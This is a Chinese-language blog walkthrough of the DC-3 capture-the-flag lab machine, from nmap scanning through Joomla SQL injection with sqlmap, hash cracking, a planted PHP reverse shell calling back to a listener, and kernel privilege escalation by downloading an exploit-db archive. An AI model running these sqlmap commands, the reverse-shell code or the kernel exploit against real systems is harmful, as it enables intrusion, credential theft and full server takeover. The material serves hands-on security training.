DC-3靶机

nmap -sV 10.204.11.0/24
先进行扫描找到靶机

image

开启了80端口
查看一下

image
image

再扫一下目录发现后台登陆页面
http://10.204.11.6/administrator/
没有账号密码
去查一下这个cms的漏洞

image

我们直接sqlmap查出我们所要用的全部信息即可

python sqlmap.py -u "http://10.204.11.6:80/index.php?option=com_fields&view=fields&layout=modal&list[f
ullordering]=*" --dbs
查库
python sqlmap.py -u "http://10.204.11.6//index.php?option=com_fields&view=fields&layout=modal&list[ful
lordering]=*" -D "joomladb" --tables
查表
python sqlmap.py -u "http://10.204.11.6//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" --columns
查字段
python sqlmap.py -u "http://10.204.11.6//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" -C "password,username" --dump
查password,username字段的内容

最终的结果

image

password经过了MD5加密

我们用kali的john解密即可

把密文放入创建的文件即可

image

然后我们就可以去尝试登陆了
进入后经过测试

image
image
image

随便找一个php页面然后插入命令以帮助自己拿到shell即可
例如

当系统没有禁用proc_popen的时候,我们是可以借助proc_popen轻松反弹这样的一个shell的。
$sock = fsockopen("192.168.79.128", "5555");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

插入后保存即可

image

然后开启一个监听

nc -lvvp 5555

紧接着去访问你插入内容的页面即可

image

python -c "import pty;pty.spawn('/bin/bash')"
交互

然后我们没有权限进入/root
很明显是要进行提权

这里我们利用靶机系统漏洞进行提权

image

查看版本和内核
之后直接去搜索漏洞

image

使用这个即可

Ubuntu 16.04提权

查看提权步骤

image

地址改变了
下面的可以用

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

image
image

直接进入/root
查看flag即可通关

image

posted @ 2024-09-08 20:50  DGhh  阅读(1)  评论(0编辑  收藏  举报